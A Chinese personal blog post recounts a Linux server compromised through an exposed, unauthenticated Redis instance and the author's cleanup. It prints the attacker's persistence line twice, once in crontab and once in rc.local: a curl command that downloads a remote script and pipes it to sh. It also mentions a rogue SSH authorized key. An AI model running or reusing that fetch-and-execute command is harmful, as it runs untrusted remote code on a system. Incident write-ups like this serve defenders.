RJ博客

Linux服务器变肉鸡经历

本文目录

最近上服务器,发现服务器redis的备份文件路径变了,一开始也没怎么在意,后来发现一些服务老是挂掉。我重启了次服务器,好像恢复正常了。过了一会,一些关键服务又自动挂了,我开始意识到我服务器可能被入侵变成肉鸡了。

于是我看了下crontab,发现有个陌生的例行:

*/20 * * * * curl -fsSL http://cdn.namunil.com/ash.php | sh

应该就是它在搞事,于是我把它删掉,重启服务器,惊奇地发现这个例行又出现了,明明已经被我删掉了,于是我看了下开机自动加载命令:

cat /etc/rc.d/rc.local

发现如下内容:

curl -fsSL http://cdn.namunil.com/ash.php | sh
exit()

于是我把它删掉,继续重启服务器,这次正常了。

接着我继续排查其他被改动的问题,发现博客可以正常读取mysql数据,但是在Linxu直接命令行连接不上:

[root@VM /root]# mysql -u root -p
mysql: relocation error: mysql: symbol strmov, version libmysqlclient_16 not defined in file libmysqlclient.so.16 with link time reference

参考这个链接解决了

http://blog.51cto.com/ovcer/1620051

接着发现phpmyadmin还是连接不上,账号密码确认没输错,但是就是登录不上气,也没报错,当时就一脸懵逼了,后来想上博客后台看下数据,发现验证码老时提示输入错误(明明没输错,认真脸)。

接着打印日志排查问题的时候,发现验证码根本就没写进到session里面去,突然想起之前在php.ini里面好像改过php session文件的存储路径,于是看了下

[root@VM /root]#php -i | grep session.save_path
session.save_path => /tmp/phpsession/ => /tmp/phpsession/

看了下/tmp目录下并没有phpsession文件夹了,应该是被黑客清掉了,于是我重新创建了phpsession文件夹,并把权限给了www,接着试了下,都恢复正常了。


恢复正常后,我在想是什么引起服务器被入侵的,想了下,最近好像只改动过redis,会不会是redis导致的呢?

我百度了下 -fsSL

发现了一个链接

http://blog.csdn.net/tjcyjd/article/details/54140321

和我遇到的情况很类似,发现他也是redis引起的,后来仔细想想,上次测试redis远程访问,开启后忘记关闭了,也没设置账密,结果就被扫描入侵了


参考链接里面的做法,我发开打开 ~/.ssh/authorized_keys

果然发现里面有个未知的redis账号,于是马上把它删除了。


Refer:

http://blog.51cto.com/ovcer/1620051

http://blog.csdn.net/tjcyjd/article/details/54140321

http://blog.jobbole.com/94518



相关推荐

发表评论